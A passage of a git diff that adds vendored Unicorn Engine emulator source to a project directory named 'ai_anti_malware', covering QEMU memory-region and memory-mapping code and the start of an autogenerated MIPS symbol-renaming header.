MemoryListener *listener; + + /* Flush out anything from MemoryListeners listening in on this */ + memory_region_transaction_begin(as->uc); + as->root = NULL; + memory_region_transaction_commit(as->uc); + QTAILQ_REMOVE(&as->uc->address_spaces, as, address_spaces_link); + address_space_unregister(as); + + address_space_destroy_dispatch(as); + + // TODO(danghvu): why assert fail here? + QTAILQ_FOREACH(listener, &as->uc->memory_listeners, link) { + // assert(listener->address_space_filter != as); + } + + flatview_unref(as->current_map); + g_free(as->name); +} + +bool io_mem_read(MemoryRegion *mr, hwaddr addr, uint64_t *pval, unsigned size) +{ + return memory_region_dispatch_read(mr, addr, pval, size); +} + +bool io_mem_write(MemoryRegion *mr, hwaddr addr, + uint64_t val, unsigned size) +{ + return memory_region_dispatch_write(mr, addr, val, size); +} + +typedef struct MemoryRegionList MemoryRegionList; + +struct MemoryRegionList { + const MemoryRegion *mr; + QTAILQ_ENTRY(MemoryRegionList) queue; +}; + +typedef QTAILQ_HEAD(queue, MemoryRegionList) MemoryRegionListHead; + +static const TypeInfo memory_region_info = { + TYPE_MEMORY_REGION, + TYPE_OBJECT, + + 0, + sizeof(MemoryRegion), + NULL, + + memory_region_initfn, + NULL, + memory_region_finalize, +}; + +void memory_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &memory_region_info); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/memory_mapping.c b/ai_anti_malware/unicorn/unicorn-master/qemu/memory_mapping.c new file mode 100644 index 0000000..324daa8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/memory_mapping.c @@ -0,0 +1,266 @@ +/* + * QEMU memory mapping + * + * Copyright Fujitsu, Corp. 2011, 2012 + * + * Authors: + * Wen Congyang + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "glib_compat.h" + +#include "cpu.h" +#include "exec/cpu-all.h" +#include "sysemu/memory_mapping.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" + +#include "uc_priv.h" + +//#define DEBUG_GUEST_PHYS_REGION_ADD + +static void memory_mapping_list_add_mapping_sorted(MemoryMappingList *list, + MemoryMapping *mapping) +{ + MemoryMapping *p; + + QTAILQ_FOREACH(p, &list->head, next) { + if (p->phys_addr >= mapping->phys_addr) { + QTAILQ_INSERT_BEFORE(p, mapping, next); + return; + } + } + QTAILQ_INSERT_TAIL(&list->head, mapping, next); +} + +static void create_new_memory_mapping(MemoryMappingList *list, + hwaddr phys_addr, + hwaddr virt_addr, + ram_addr_t length) +{ + MemoryMapping *memory_mapping; + + memory_mapping = g_malloc(sizeof(MemoryMapping)); + memory_mapping->phys_addr = phys_addr; + memory_mapping->virt_addr = virt_addr; + memory_mapping->length = length; + list->last_mapping = memory_mapping; + list->num++; + memory_mapping_list_add_mapping_sorted(list, memory_mapping); +} + +static inline bool mapping_contiguous(MemoryMapping *map, + hwaddr phys_addr, + hwaddr virt_addr) +{ + return phys_addr == map->phys_addr + map->length && + virt_addr == map->virt_addr + map->length; +} + +/* + * [map->phys_addr, map->phys_addr + map->length) and + * [phys_addr, phys_addr + length) have intersection? + */ +static inline bool mapping_have_same_region(MemoryMapping *map, + hwaddr phys_addr, + ram_addr_t length) +{ + return !(phys_addr + length < map->phys_addr || + phys_addr >= map->phys_addr + map->length); +} + +/* + * [map->phys_addr, map->phys_addr + map->length) and + * [phys_addr, phys_addr + length) have intersection. The virtual address in the + * intersection are the same? + */ +static inline bool mapping_conflict(MemoryMapping *map, + hwaddr phys_addr, + hwaddr virt_addr) +{ + return virt_addr - map->virt_addr != phys_addr - map->phys_addr; +} + +/* + * [map->virt_addr, map->virt_addr + map->length) and + * [virt_addr, virt_addr + length) have intersection. And the physical address + * in the intersection are the same. + */ +static inline void mapping_merge(MemoryMapping *map, + hwaddr virt_addr, + ram_addr_t length) +{ + if (virt_addr < map->virt_addr) { + map->length += map->virt_addr - virt_addr; + map->virt_addr = virt_addr; + } + + if ((virt_addr + length) > + (map->virt_addr + map->length)) { + map->length = virt_addr + length - map->virt_addr; + } +} + +void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, + hwaddr phys_addr, + hwaddr virt_addr, + ram_addr_t length) +{ + MemoryMapping *memory_mapping, *last_mapping; + + if (QTAILQ_EMPTY(&list->head)) { + create_new_memory_mapping(list, phys_addr, virt_addr, length); + return; + } + + last_mapping = list->last_mapping; + if (last_mapping) { + if (mapping_contiguous(last_mapping, phys_addr, virt_addr)) { + last_mapping->length += length; + return; + } + } + + QTAILQ_FOREACH(memory_mapping, &list->head, next) { + if (mapping_contiguous(memory_mapping, phys_addr, virt_addr)) { + memory_mapping->length += length; + list->last_mapping = memory_mapping; + return; + } + + if (phys_addr + length < memory_mapping->phys_addr) { + /* create a new region before memory_mapping */ + break; + } + + if (mapping_have_same_region(memory_mapping, phys_addr, length)) { + if (mapping_conflict(memory_mapping, phys_addr, virt_addr)) { + continue; + } + + /* merge this region into memory_mapping */ + mapping_merge(memory_mapping, virt_addr, length); + list->last_mapping = memory_mapping; + return; + } + } + + /* this region can not be merged into any existed memory mapping. */ + create_new_memory_mapping(list, phys_addr, virt_addr, length); +} + +void memory_mapping_list_free(MemoryMappingList *list) +{ + MemoryMapping *p, *q; + + QTAILQ_FOREACH_SAFE(p, &list->head, next, q) { + QTAILQ_REMOVE(&list->head, p, next); + g_free(p); + } + + list->num = 0; + list->last_mapping = NULL; +} + +void memory_mapping_list_init(MemoryMappingList *list) +{ + list->num = 0; + list->last_mapping = NULL; + QTAILQ_INIT(&list->head); +} + +void guest_phys_blocks_free(GuestPhysBlockList *list) +{ + GuestPhysBlock *p, *q; + + QTAILQ_FOREACH_SAFE(p, &list->head, next, q) { + QTAILQ_REMOVE(&list->head, p, next); + g_free(p); + } + list->num = 0; +} + +void guest_phys_blocks_init(GuestPhysBlockList *list) +{ + list->num = 0; + QTAILQ_INIT(&list->head); +} + +typedef struct GuestPhysListener { + GuestPhysBlockList *list; + MemoryListener listener; +} GuestPhysListener; + +void qemu_get_guest_memory_mapping(struct uc_struct *uc, + MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks, + Error **errp) +{ + CPUState *cpu = uc->cpu; + GuestPhysBlock *block; + ram_addr_t offset, length; + + if (cpu_paging_enabled(cpu)) { + Error *err = NULL; + cpu_get_memory_mapping(cpu, list, &err); + if (err) { + error_propagate(errp, err); + return; + } + return; + } + + /* + * If the guest doesn't use paging, the virtual address is equal to physical + * address. + */ + QTAILQ_FOREACH(block, &guest_phys_blocks->head, next) { + offset = block->target_start; + length = block->target_end - block->target_start; + create_new_memory_mapping(list, offset, offset, length); + } +} + +void qemu_get_guest_simple_memory_mapping(MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks) +{ + GuestPhysBlock *block; + + QTAILQ_FOREACH(block, &guest_phys_blocks->head, next) { + create_new_memory_mapping(list, block->target_start, 0, + block->target_end - block->target_start); + } +} + +void memory_mapping_filter(MemoryMappingList *list, int64_t begin, + int64_t length) +{ + MemoryMapping *cur, *next; + + QTAILQ_FOREACH_SAFE(cur, &list->head, next, next) { + if (cur->phys_addr >= begin + length || + cur->phys_addr + cur->length <= begin) { + QTAILQ_REMOVE(&list->head, cur, next); + list->num--; + continue; + } + + if (cur->phys_addr < begin) { + cur->length -= begin - cur->phys_addr; + if (cur->virt_addr) { + cur->virt_addr += begin - cur->phys_addr; + } + cur->phys_addr = begin; + } + + if (cur->phys_addr + cur->length > begin + length) { + cur->length -= cur->phys_addr + cur->length - begin - length; + } + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mips.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mips.h new file mode 100644 index 0000000..36ad9a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mips.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPS_H +#define UNICORN_AUTOGEN_MIPS_H +#define arm_release arm_release_mips +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mips +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mips +#define use_idiv_instructions_rt use_idiv_instructions_rt_mips +#define tcg_target_deposit_valid tcg_target_deposit_valid_mips +#define helper_power_down helper_power_down_mips +#define check_exit_request check_exit_request_mips +#define address_space_unregister address_space_unregister_mips +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips +#define phys_mem_clean phys_mem_clean_mips +#define tb_cleanup tb_cleanup_mips +#define memory_map memory_map_mips +#define memory_map_ptr memory_map_ptr_mips +#define memory_unmap memory_unmap_mips +#define memory_free memory_free_mips +#define free_code_gen_buffer free_code_gen_buffer_mips +#define helper_raise_exception helper_raise_exception_mips +#define tcg_enabled tcg_enabled_mips +#define tcg_exec_init tcg_exec_init_mips +#define memory_register_types memory_register_types_mips +#define cpu_exec_init_all cpu_exec_init_all_mips +#define vm_start vm_start_mips +#define resume_all_vcpus resume_all_vcpus_mips +#define a15_l2ctlr_read a15_l2ctlr_read_mips +#define a64_translate_init a64_translate_init_mips +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mips +#define aa64_cacheop_access aa64_cacheop_access_mips +#define aa64_daif_access aa64_daif_access_mips +#define aa64_daif_write aa64_daif_write_mips +#define aa64_dczid_read aa64_dczid_read_mips +#define aa64_fpcr_read aa64_fpcr_read_mips +#define aa64_fpcr_write aa64_fpcr_write_mips +#define aa64_fpsr_read aa64_fpsr_read_mips +#define aa64_fpsr_write aa64_fpsr_write_mips +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mips +#define aa64_zva_access aa64_zva_access_mips +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mips +#define aarch64_restore_sp aarch64_restore_sp_mips +#define aarch64_save_sp aarch64_save_sp_mips +#define accel_find accel_find_mips +#define accel_init_machine accel_init_machine_mips +#define accel_type accel_type_mips +#define access_with_adjusted_size access_with_adjusted_size_mips +#define add128 add128_mips +#define add16_sat add16_sat_mips +#define add16_usat add16_usat_mips +#define add192 add192_mips +#define add8_sat add8_sat_mips +#define add8_usat add8_usat_mips +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mips +#define add_cpreg_to_list add_cpreg_to_list_mips +#define addFloat128Sigs addFloat128Sigs_mips +#define addFloat32Sigs addFloat32Sigs_mips +#define addFloat64Sigs addFloat64Sigs_mips +#define addFloatx80Sigs addFloatx80Sigs_mips +#define add_qemu_ldst_label add_qemu_ldst_label_mips +#define address_space_access_valid address_space_access_valid_mips +#define address_space_destroy address_space_destroy_mips +#define address_space_destroy_dispatch address_space_destroy_dispatch_mips +#define address_space_get_flatview address_space_get_flatview_mips +#define address_space_init address_space_init_mips +#define address_space_init_dispatch address_space_init_dispatch_mips +#define address_space_lookup_region address_space_lookup_region_mips +#define address_space_map address_space_map_mips +#define address_space_read address_space_read_mips +#define address_space_rw address_space_rw_mips +#define address_space_translate address_space_translate_mips +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips +#define address_space_translate_internal address_space_translate_internal_mips +#define address_space_unmap address_space_unmap_mips +#define address_space_update_topology address_space_update_topology_mips +#define address_space_update_topology_pass address_space_update_topology_pass_mips +#define address_space_write address_space_write_mips +#define addrrange_contains addrrange_contains_mips +#define addrrange_end addrrange_end_mips +#define addrrange_equal addrrange_equal_mips +#define addrrange_intersection addrrange_intersection_mips +#define addrrange_intersects addrrange_intersects_mips +#define addrrange_make addrrange_make_mips +#define adjust_endianness adjust_endianness_mips +#define all_helpers all_helpers_mips +#define alloc_code_gen_buffer alloc_code_gen_buffer_mips +#define alloc_entry alloc_entry_mips +#define always_true always_true_mips +#define arm1026_initfn arm1026_initfn_mips +#define arm1136_initfn arm1136_initfn_mips +#define arm1136_r2_initfn arm1136_r2_initfn_mips +#define arm1176_initfn arm1176_initfn_mips +#define arm11mpcore_initfn arm11mpcore_initfn_mips +#define arm926_initfn arm926_initfn_mips +#define arm946_initfn arm946_initfn_mips +#define arm_ccnt_enabled arm_ccnt_enabled_mips +#define arm_cp_read_zero arm_cp_read_zero_mips +#define arm_cp_reset_ignore arm_cp_reset_ignore_mips +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mips +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mips +#define arm_cpu_finalizefn arm_cpu_finalizefn_mips +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mips +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mips +#define arm_cpu_initfn arm_cpu_initfn_mips +#define arm_cpu_list arm_cpu_list_mips +#define cpu_loop_exit cpu_loop_exit_mips +#define arm_cpu_post_init arm_cpu_post_init_mips +#define arm_cpu_realizefn arm_cpu_realizefn_mips +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mips +#define arm_cpu_register_types arm_cpu_register_types_mips +#define cpu_resume_from_signal cpu_resume_from_signal_mips +#define arm_cpus arm_cpus_mips +#define arm_cpu_set_pc arm_cpu_set_pc_mips +#define arm_cp_write_ignore arm_cp_write_ignore_mips +#define arm_current_el arm_current_el_mips +#define arm_dc_feature arm_dc_feature_mips +#define arm_debug_excp_handler arm_debug_excp_handler_mips +#define arm_debug_target_el arm_debug_target_el_mips +#define arm_el_is_aa64 arm_el_is_aa64_mips +#define arm_env_get_cpu arm_env_get_cpu_mips +#define arm_excp_target_el arm_excp_target_el_mips +#define arm_excp_unmasked arm_excp_unmasked_mips +#define arm_feature arm_feature_mips +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mips +#define gen_intermediate_code gen_intermediate_code_mips +#define gen_intermediate_code_pc gen_intermediate_code_pc_mips +#define arm_gen_test_cc arm_gen_test_cc_mips +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mips +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mips +#define arm_handle_psci_call arm_handle_psci_call_mips +#define arm_is_psci_call arm_is_psci_call_mips +#define arm_is_secure arm_is_secure_mips +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mips +#define arm_ldl_code arm_ldl_code_mips +#define arm_lduw_code arm_lduw_code_mips +#define arm_log_exception arm_log_exception_mips +#define arm_reg_read arm_reg_read_mips +#define arm_reg_reset arm_reg_reset_mips +#define arm_reg_write arm_reg_write_mips +#define restore_state_to_opc restore_state_to_opc_mips +#define arm_rmode_to_sf arm_rmode_to_sf_mips +#define arm_singlestep_active arm_singlestep_active_mips +#define tlb_fill tlb_fill_mips +#define tlb_flush tlb_flush_mips +#define tlb_flush_page tlb_flush_page_mips +#define tlb_set_page tlb_set_page_mips +#define arm_translate_init arm_translate_init_mips +#define arm_v7m_class_init arm_v7m_class_init_mips +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mips +#define ats_access ats_access_mips +#define ats_write ats_write_mips +#define bad_mode_switch bad_mode_switch_mips +#define bank_number bank_number_mips +#define bitmap_zero_extend bitmap_zero_extend_mips +#define bp_wp_matches bp_wp_matches_mips +#define breakpoint_invalidate breakpoint_invalidate_mips +#define build_page_bitmap build_page_bitmap_mips +#define bus_add_child bus_add_child_mips +#define bus_class_init bus_class_init_mips +#define bus_info bus_info_mips +#define bus_unparent bus_unparent_mips +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mips +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mips +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mips +#define call_recip_estimate call_recip_estimate_mips +#define can_merge can_merge_mips +#define capacity_increase capacity_increase_mips +#define ccsidr_read ccsidr_read_mips +#define check_ap check_ap_mips +#define check_breakpoints check_breakpoints_mips +#define check_watchpoints check_watchpoints_mips +#define cho cho_mips +#define clear_bit clear_bit_mips +#define clz32 clz32_mips +#define clz64 clz64_mips +#define cmp_flatrange_addr cmp_flatrange_addr_mips +#define code_gen_alloc code_gen_alloc_mips +#define commonNaNToFloat128 commonNaNToFloat128_mips +#define commonNaNToFloat16 commonNaNToFloat16_mips +#define commonNaNToFloat32 commonNaNToFloat32_mips +#define commonNaNToFloat64 commonNaNToFloat64_mips +#define commonNaNToFloatx80 commonNaNToFloatx80_mips +#define compute_abs_deadline compute_abs_deadline_mips +#define cond_name cond_name_mips +#define configure_accelerator configure_accelerator_mips +#define container_get container_get_mips +#define container_info container_info_mips +#define container_register_types container_register_types_mips +#define contextidr_write contextidr_write_mips +#define core_log_global_start core_log_global_start_mips +#define core_log_global_stop core_log_global_stop_mips +#define core_memory_listener core_memory_listener_mips +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mips +#define cortex_a15_initfn cortex_a15_initfn_mips +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mips +#define cortex_a8_initfn cortex_a8_initfn_mips +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mips +#define cortex_a9_initfn cortex_a9_initfn_mips +#define cortex_m3_initfn cortex_m3_initfn_mips +#define count_cpreg count_cpreg_mips +#define countLeadingZeros32 countLeadingZeros32_mips +#define countLeadingZeros64 countLeadingZeros64_mips +#define cp_access_ok cp_access_ok_mips +#define cpacr_write cpacr_write_mips +#define cpreg_field_is_64bit cpreg_field_is_64bit_mips +#define cp_reginfo cp_reginfo_mips +#define cpreg_key_compare cpreg_key_compare_mips +#define cpreg_make_keylist cpreg_make_keylist_mips +#define cp_reg_reset cp_reg_reset_mips +#define cpreg_to_kvm_id cpreg_to_kvm_id_mips +#define cpsr_read cpsr_read_mips +#define cpsr_write cpsr_write_mips +#define cptype_valid cptype_valid_mips +#define cpu_abort cpu_abort_mips +#define cpu_arm_exec cpu_arm_exec_mips +#define cpu_arm_gen_code cpu_arm_gen_code_mips +#define cpu_arm_init cpu_arm_init_mips +#define cpu_breakpoint_insert cpu_breakpoint_insert_mips +#define cpu_breakpoint_remove cpu_breakpoint_remove_mips +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips +#define cpu_can_do_io cpu_can_do_io_mips +#define cpu_can_run cpu_can_run_mips +#define cpu_class_init cpu_class_init_mips +#define cpu_common_class_by_name cpu_common_class_by_name_mips +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mips +#define cpu_common_get_arch_id cpu_common_get_arch_id_mips +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mips +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mips +#define cpu_common_has_work cpu_common_has_work_mips +#define cpu_common_initfn cpu_common_initfn_mips +#define cpu_common_noop cpu_common_noop_mips +#define cpu_common_parse_features cpu_common_parse_features_mips +#define cpu_common_realizefn cpu_common_realizefn_mips +#define cpu_common_reset cpu_common_reset_mips +#define cpu_dump_statistics cpu_dump_statistics_mips +#define cpu_exec_init cpu_exec_init_mips +#define cpu_flush_icache_range cpu_flush_icache_range_mips +#define cpu_gen_init cpu_gen_init_mips +#define cpu_get_clock cpu_get_clock_mips +#define cpu_get_real_ticks cpu_get_real_ticks_mips +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mips +#define cpu_handle_debug_exception cpu_handle_debug_exception_mips +#define cpu_handle_guest_debug cpu_handle_guest_debug_mips +#define cpu_inb cpu_inb_mips +#define cpu_inl cpu_inl_mips +#define cpu_interrupt cpu_interrupt_mips +#define cpu_interrupt_handler cpu_interrupt_handler_mips +#define cpu_inw cpu_inw_mips +#define cpu_io_recompile cpu_io_recompile_mips +#define cpu_is_stopped cpu_is_stopped_mips +#define cpu_ldl_code cpu_ldl_code_mips +#define cpu_ldub_code cpu_ldub_code_mips +#define cpu_lduw_code cpu_lduw_code_mips +#define cpu_memory_rw_debug cpu_memory_rw_debug_mips +#define cpu_mmu_index cpu_mmu_index_mips +#define cpu_outb cpu_outb_mips +#define cpu_outl cpu_outl_mips +#define cpu_outw cpu_outw_mips +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mips +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mips +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mips +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mips +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mips +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips +#define cpu_physical_memory_map cpu_physical_memory_map_mips +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mips +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mips +#define cpu_physical_memory_rw cpu_physical_memory_rw_mips +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mips +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mips +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mips +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mips +#define cpu_register cpu_register_mips +#define cpu_register_types cpu_register_types_mips +#define cpu_restore_state cpu_restore_state_mips +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mips +#define cpu_single_step cpu_single_step_mips +#define cpu_tb_exec cpu_tb_exec_mips +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mips +#define cpu_to_be64 cpu_to_be64_mips +#define cpu_to_le32 cpu_to_le32_mips +#define cpu_to_le64 cpu_to_le64_mips +#define cpu_type_info cpu_type_info_mips +#define cpu_unassigned_access cpu_unassigned_access_mips +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips +#define cpu_watchpoint_insert cpu_watchpoint_insert_mips +#define cpu_watchpoint_remove cpu_watchpoint_remove_mips +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips +#define crc32c_table crc32c_table_mips +#define create_new_memory_mapping create_new_memory_mapping_mips +#define csselr_write csselr_write_mips +#define cto32 cto32_mips +#define ctr_el0_access ctr_el0_access_mips +#define ctz32 ctz32_mips +#define ctz64 ctz64_mips +#define dacr_write dacr_write_mips +#define dbgbcr_write dbgbcr_write_mips +#define dbgbvr_write dbgbvr_write_mips +#define dbgwcr_write dbgwcr_write_mips +#define dbgwvr_write dbgwvr_write_mips +#define debug_cp_reginfo debug_cp_reginfo_mips +#define debug_frame debug_frame_mips +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mips +#define define_arm_cp_regs define_arm_cp_regs_mips +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mips +#define define_debug_regs define_debug_regs_mips +#define define_one_arm_cp_reg define_one_arm_cp_reg_mips +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mips +#define deposit32 deposit32_mips +#define deposit64 deposit64_mips +#define deregister_tm_clones deregister_tm_clones_mips +#define device_class_base_init device_class_base_init_mips +#define device_class_init device_class_init_mips +#define device_finalize device_finalize_mips +#define device_get_realized device_get_realized_mips +#define device_initfn device_initfn_mips +#define device_post_init device_post_init_mips +#define device_reset device_reset_mips +#define device_set_realized device_set_realized_mips +#define device_type_info device_type_info_mips +#define disas_arm_insn disas_arm_insn_mips +#define disas_coproc_insn disas_coproc_insn_mips +#define disas_dsp_insn disas_dsp_insn_mips +#define disas_iwmmxt_insn disas_iwmmxt_insn_mips +#define disas_neon_data_insn disas_neon_data_insn_mips +#define disas_neon_ls_insn disas_neon_ls_insn_mips +#define disas_thumb2_insn disas_thumb2_insn_mips +#define disas_thumb_insn disas_thumb_insn_mips +#define disas_vfp_insn disas_vfp_insn_mips +#define disas_vfp_v8_insn disas_vfp_v8_insn_mips +#define do_arm_semihosting do_arm_semihosting_mips +#define do_clz16 do_clz16_mips +#define do_clz8 do_clz8_mips +#define do_constant_folding do_constant_folding_mips +#define do_constant_folding_2 do_constant_folding_2_mips +#define do_constant_folding_cond do_constant_folding_cond_mips +#define do_constant_folding_cond2 do_constant_folding_cond2_mips +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mips +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mips +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mips +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mips +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mips +#define do_ssat do_ssat_mips +#define do_usad do_usad_mips +#define do_usat do_usat_mips +#define do_v7m_exception_exit do_v7m_exception_exit_mips +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mips +#define dummy_func dummy_func_mips +#define dummy_section dummy_section_mips +#define _DYNAMIC _DYNAMIC_mips +#define _edata _edata_mips +#define _end _end_mips +#define end_list end_list_mips +#define eq128 eq128_mips +#define ErrorClass_lookup ErrorClass_lookup_mips +#define error_copy error_copy_mips +#define error_exit error_exit_mips +#define error_get_class error_get_class_mips +#define error_get_pretty error_get_pretty_mips +#define error_setg_file_open error_setg_file_open_mips +#define estimateDiv128To64 estimateDiv128To64_mips +#define estimateSqrt32 estimateSqrt32_mips +#define excnames excnames_mips +#define excp_is_internal excp_is_internal_mips +#define extended_addresses_enabled extended_addresses_enabled_mips +#define extended_mpu_ap_bits extended_mpu_ap_bits_mips +#define extract32 extract32_mips +#define extract64 extract64_mips +#define extractFloat128Exp extractFloat128Exp_mips +#define extractFloat128Frac0 extractFloat128Frac0_mips +#define extractFloat128Frac1 extractFloat128Frac1_mips +#define extractFloat128Sign extractFloat128Sign_mips +#define extractFloat16Exp extractFloat16Exp_mips +#define extractFloat16Frac extractFloat16Frac_mips +#define extractFloat16Sign extractFloat16Sign_mips +#define extractFloat32Exp extractFloat32Exp_mips +#define extractFloat32Frac extractFloat32Frac_mips +#define extractFloat32Sign extractFloat32Sign_mips +#define extractFloat64Exp extractFloat64Exp_mips +#define extractFloat64Frac extractFloat64Frac_mips +#define extractFloat64Sign extractFloat64Sign_mips +#define extractFloatx80Exp extractFloatx80Exp_mips +#define extractFloatx80Frac extractFloatx80Frac_mips +#define extractFloatx80Sign extractFloatx80Sign_mips +#define fcse_write fcse_write_mips +#define find_better_copy find_better_copy_mips +#define find_default_machine find_default_machine_mips +#define find_desc_by_name find_desc_by_name_mips +#define find_first_bit find_first_bit_mips +#define find_paging_enabled_cpu find_paging_enabled_cpu_mips +#define find_ram_block find_ram_block_mips +#define find_ram_offset find_ram_offset_mips +#define find_string find_string_mips +#define find_type find_type_mips +#define _fini _fini_mips +#define flatrange_equal flatrange_equal_mips +#define flatview_destroy flatview_destroy_mips +#define flatview_init flatview_init_mips +#define flatview_insert flatview_insert_mips +#define flatview_lookup flatview_lookup_mips +#define flatview_ref flatview_ref_mips +#define flatview_simplify flatview_simplify_mips +#define flatview_unref flatview_unref_mips +#define float128_add float128_add_mips +#define float128_compare float128_compare_mips +#define float128_compare_internal float128_compare_internal_mips +#define float128_compare_quiet float128_compare_quiet_mips +#define float128_default_nan float128_default_nan_mips +#define float128_div float128_div_mips +#define float128_eq float128_eq_mips +#define float128_eq_quiet float128_eq_quiet_mips +#define float128_is_quiet_nan float128_is_quiet_nan_mips +#define float128_is_signaling_nan float128_is_signaling_nan_mips +#define float128_le float128_le_mips +#define float128_le_quiet float128_le_quiet_mips +#define float128_lt float128_lt_mips +#define float128_lt_quiet float128_lt_quiet_mips +#define float128_maybe_silence_nan float128_maybe_silence_nan_mips +#define float128_mul float128_mul_mips +#define float128_rem float128_rem_mips +#define float128_round_to_int float128_round_to_int_mips +#define float128_scalbn float128_scalbn_mips +#define float128_sqrt float128_sqrt_mips +#define float128_sub float128_sub_mips +#define float128ToCommonNaN float128ToCommonNaN_mips +#define float128_to_float32 float128_to_float32_mips +#define float128_to_float64 float128_to_float64_mips +#define float128_to_floatx80 float128_to_floatx80_mips +#define float128_to_int32 float128_to_int32_mips +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips +#define float128_to_int64 float128_to_int64_mips +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips +#define float128_unordered float128_unordered_mips +#define float128_unordered_quiet float128_unordered_quiet_mips +#define float16_default_nan float16_default_nan_mips +#define float16_is_quiet_nan float16_is_quiet_nan_mips +#define float16_is_signaling_nan float16_is_signaling_nan_mips +#define float16_maybe_silence_nan float16_maybe_silence_nan_mips +#define float16ToCommonNaN float16ToCommonNaN_mips +#define float16_to_float32 float16_to_float32_mips +#define float16_to_float64 float16_to_float64_mips +#define float32_abs float32_abs_mips +#define float32_add float32_add_mips +#define float32_chs float32_chs_mips +#define float32_compare float32_compare_mips +#define float32_compare_internal float32_compare_internal_mips +#define float32_compare_quiet float32_compare_quiet_mips +#define float32_default_nan float32_default_nan_mips +#define float32_div float32_div_mips +#define float32_eq float32_eq_mips +#define float32_eq_quiet float32_eq_quiet_mips +#define float32_exp2 float32_exp2_mips +#define float32_exp2_coefficients float32_exp2_coefficients_mips +#define float32_is_any_nan float32_is_any_nan_mips +#define float32_is_infinity float32_is_infinity_mips +#define float32_is_neg float32_is_neg_mips +#define float32_is_quiet_nan float32_is_quiet_nan_mips +#define float32_is_signaling_nan float32_is_signaling_nan_mips +#define float32_is_zero float32_is_zero_mips +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mips +#define float32_le float32_le_mips +#define float32_le_quiet float32_le_quiet_mips +#define float32_log2 float32_log2_mips +#define float32_lt float32_lt_mips +#define float32_lt_quiet float32_lt_quiet_mips +#define float32_max float32_max_mips +#define float32_maxnum float32_maxnum_mips +#define float32_maxnummag float32_maxnummag_mips +#define float32_maybe_silence_nan float32_maybe_silence_nan_mips +#define float32_min float32_min_mips +#define float32_minmax float32_minmax_mips +#define float32_minnum float32_minnum_mips 